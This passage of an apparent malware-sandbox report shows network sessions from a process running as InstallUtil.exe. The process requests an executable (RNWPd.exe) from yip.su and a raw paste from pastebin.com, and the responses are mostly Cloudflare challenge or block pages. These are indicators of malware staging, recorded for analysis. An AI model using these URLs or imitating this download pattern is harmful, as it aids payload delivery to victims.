64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:21:56 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:21:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49715	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:56 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:21:56 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:21:56 UTC	685	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6b 56 4a 4b 46 64 6a 52 63 78 47 50 48 6d 42 70 54 47 6e 76 47 6b 48 46 6f 58 4d 4f 61 67 2b 6e 4a 50 6f 50 36 77 38 49 70 37 64 39 6c 6d 57 4d 78 6c 70 49 45 51 59 30 6f 32 58 75 64 69 67 56 30 68 2f 79 31 34 71 5a 6f 63 42 52 48 6e 58 51 56 69 2f 52 39 50 31 77 47 54 41 2b 67 6d 34 38 5a 37 48 72 35 50 58 4c 34 36 41 3d 24 64 63 6e 2f 4d 77 4f 34 46 69 35 2f 33 7a 70 34 2f 51 4c 73 51 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: kVJKFdjRcxGPHmBpTGnvGkHFoXMOag+nJPoP6w8Ip7d9lmWMxlpIEQY0o2XudigV0h/y14qZocBRHnXQVi/R9P1wGTA+gm48Z7Hr5PXL46A=$dcn/MwO4Fi5/3zp4/QLsQg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 33 62 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3be6<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 32 30 36 33 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 38 61 39 64 64 32 35 65 37 38 27 2c 63 48 61 73 68 3a 20 27 36 63 33 33 65 34 65 36 37 66 63 34 64 63 66 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 56 48 5f 4d 33 54 4b 38 68 64 39 78 78 65 69 6e 71 69 37 6d 45 75 67 6e 41 43 4b 4b 57 48 32 77 41 78 7a 6b 67 6e 47 79 62 73 77 2d 31 37 32 33 33 36 38 31 31 36 2d 30 2e 30 2e 31 2e 31 2d 33 36 30 34 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d 65 Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '2063',cRay: '8b17288a9dd25e78',cHash: '6c33e4e67fc4dcf',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=VH_M3TK8hd9xxeinqi7mEugnACKKWH2wAxzkgnGybsw-1723368116-0.0.1.1-3604",cFPWv: 'g',cTTime
2024-08-11 09:21:56 UTC	1369	IN	Data Raw: 57 4f 48 35 4b 66 42 4f 69 65 77 42 63 41 74 68 44 72 6f 67 2e 58 66 4b 31 38 52 75 4a 6d 2e 41 4b 56 77 35 49 6b 36 68 71 7a 56 4b 48 58 5a 6f 70 6e 69 63 4b 33 4f 73 55 52 76 66 67 6c 38 7a 57 49 35 32 44 59 6b 46 44 31 71 7a 4b 76 35 55 75 6c 6a 61 5a 56 4f 6e 4d 34 6a 51 6c 5a 5f 67 65 53 4a 55 51 62 74 69 56 48 5f 79 53 51 47 6f 63 6b 63 53 34 39 59 71 72 37 6f 65 39 62 63 57 6c 63 72 72 70 6b 4e 36 34 43 39 47 6e 68 72 2e 36 33 73 46 77 70 62 51 32 5f 42 4d 37 5f 73 62 6a 34 63 35 32 66 51 51 70 64 63 39 31 71 32 65 77 70 42 39 35 31 45 78 76 74 39 6d 37 46 73 78 74 36 66 4c 65 4f 51 55 42 57 43 6e 76 4c 33 4a 46 59 73 72 6c 62 35 5f 31 7a 4b 45 66 44 76 74 6a 75 73 78 4c 70 5a 62 48 33 32 4f 59 4e 73 4a 4f 51 63 66 76 31 73 37 30 4f 74 2e 34 31 6e Data Ascii: WOH5KfBOiewBcAthDrog.XfK18RuJm.AKVw5Ik6hqzVKHXZopnicK3OsURvfgl8zWI52DYkFD1qzKv5UuljaZVOnM4jQlZ_geSJUQbtiVH_ySQGockcS49Yqr7oe9bcWlcrrpkN64C9Gnhr.63sFwpbQ2_BM7_sbj4c52fQQpdc91q2ewpB951Exvt9m7Fsxt6fLeOQUBWCnvL3JFYsrlb5_1zKEfDvtjusxLpZbH32OYNsJOQcfv1s70Ot.41n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49717	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:01 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:02 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1728aa9c737d05-EWR
2024-08-11 09:22:02 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:02 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49718	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
